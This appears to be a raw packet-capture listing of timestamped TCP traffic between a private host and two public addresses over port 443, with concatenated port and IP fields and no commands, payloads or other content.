                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.631539106 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.635236025 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.643343925 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.646528959 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.647691965 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.647706985 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.661492109 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.723393917 CET44349795104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.724828959 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.724839926 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.725785017 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.725811005 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.732019901 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.732022047 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.732177019 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.732630968 CET44349796104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.733558893 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.733592033 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.733629942 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.733671904 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.735563040 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.737224102 CET49795443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.737250090 CET44349795104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.737831116 CET44349795104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.740374088 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.740394115 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.740665913 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.740725994 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.740745068 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.740770102 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.740778923 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.740809917 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.740816116 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.740827084 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.740973949 CET49796443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.740998983 CET44349796104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.741249084 CET49795443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.741378069 CET44349795104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.742729902 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.742815018 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.743674994 CET44349796104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.744436026 CET49795443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.746752977 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.746773005 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.747694016 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.751817942 CET49796443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.752043009 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.752051115 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.752432108 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.752448082 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.758522034 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.758542061 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.762923002 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.762943983 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.764611959 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.764626980 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.764656067 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.770896912 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.777919054 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.777934074 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.777944088 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.784590006 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.784727097 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.784734964 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.787328959 CET44349795104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.799799919 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.799828053 CET49795443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.801182985 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.801261902 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.804218054 CET49796443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.804533958 CET44349796104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.814785004 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.818897009 CET49796443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.818934917 CET44349796104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.873992920 CET49796443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.917892933 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.917907000 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.917926073 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.917937994 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.917968988 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.917985916 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.920850039 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.920874119 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.922224998 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.922410965 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.924300909 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.924314976 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.924335003 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.924344063 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.924360991 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.924371958 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.925416946 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.926215887 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.930459976 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.930469990 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.930499077 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.930509090 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.931544065 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.931560993 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.932660103 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.935998917 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.936007977 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.936031103 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.936064959 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.936114073 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.936124086 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.937562943 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.942507029 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.942549944 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.942612886 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.942621946 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.942981958 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.948270082 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.948293924 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.949440956 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.949469090 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.949554920 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.954615116 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.954636097 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.958729029 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.958748102 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.959332943 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.959364891 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.960786104 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.960803032 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.964675903 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.964684010 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.966002941 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.112162113 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.112210989 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.112257957 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.117328882 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.117445946 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.137633085 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.137742996 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.137783051 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.137816906 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.137849092 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.139637947 CET44349801104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.141407013 CET44349798104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.142474890 CET44349802104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.142474890 CET44349799104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.143424988 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.143511057 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.146365881 CET44349800104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.150916100 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.150933027 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.152481079 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.156615973 CET49802443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.156641006 CET44349802104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.156728029 CET49799443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.156739950 CET44349799104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.156892061 CET49798443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.156900883 CET44349798104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.157002926 CET49801443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.157010078 CET44349801104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.157202005 CET44349802104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.157474041 CET44349801104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.157984972 CET44349799104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.158694029 CET44349798104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.163367987 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.163889885 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.163908005 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.163944006 CET49799443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.163949013 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.178306103 CET49800443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.178333998 CET44349800104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.178653002 CET49798443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.178885937 CET44349798104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.178960085 CET49801443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.179086924 CET44349801104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.179275036 CET49802443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.179450989 CET44349802104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.179523945 CET44349800104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.179585934 CET49799443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.179719925 CET44349799104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.180041075 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.180054903 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.181159973 CET49800443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.181715965 CET49798443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.181788921 CET49801443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.181821108 CET44349801104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.181842089 CET49802443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.181885004 CET44349802104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.181885958 CET49799443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.181900024 CET44349799104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.182359934 CET49800443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.182435989 CET44349800104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.182460070 CET49800443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.185559988 CET44349797104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.194163084 CET44349796104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.194351912 CET44349796104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.194449902 CET44349796104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.194541931 CET44349796104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.194632053 CET44349796104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.196794987 CET49796443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.196808100 CET44349796104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.199503899 CET44349796104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.199589968 CET44349796104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.211740017 CET49796443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.211821079 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.216500998 CET44349795104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.216583967 CET44349795104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.216623068 CET44349795104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.216664076 CET44349795104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.216701984 CET44349795104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.216734886 CET44349795104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.216936111 CET49797443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.216949940 CET44349797104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.218220949 CET49795443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.218241930 CET44349795104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.218385935 CET44349797104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.223340988 CET44349798104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.224863052 CET44349795104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.224947929 CET44349795104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.226356030 CET49799443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.226411104 CET49795443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.226411104 CET49800443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.226428032 CET44349800104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.229000092 CET44349805104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.231179953 CET44349808104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.246853113 CET44349803104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.258090019 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.258141041 CET44349804104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.259855986 CET49797443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.266304016 CET49797443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.266464949 CET49803443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.266474009 CET44349803104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.266479969 CET44349797104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.266580105 CET49808443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.266599894 CET44349808104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.266675949 CET49805443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.266705036 CET44349805104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.266820908 CET49804443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.266829967 CET44349804104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.266882896 CET49797443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.267782927 CET44349803104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.267864943 CET44349808104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.267887115 CET44349805104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.267921925 CET44349804104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.268196106 CET49803443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.268198013 CET49808443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.268199921 CET49805443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.268306017 CET49804443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.269484997 CET49803443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.269561052 CET44349803104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.270354033 CET49808443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.270446062 CET44349808104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.270750046 CET49805443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.270859957 CET44349805104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.272125959 CET49804443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.272236109 CET44349804104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.273209095 CET49803443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.273209095 CET49803443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.273222923 CET44349803104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.273262024 CET44349803104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.273264885 CET49808443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.273274899 CET44349808104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.273323059 CET49805443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.273350000 CET44349805104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.273389101 CET49804443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.275639057 CET44349807104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.276099920 CET49796443192.168.2.12104.16.102.112
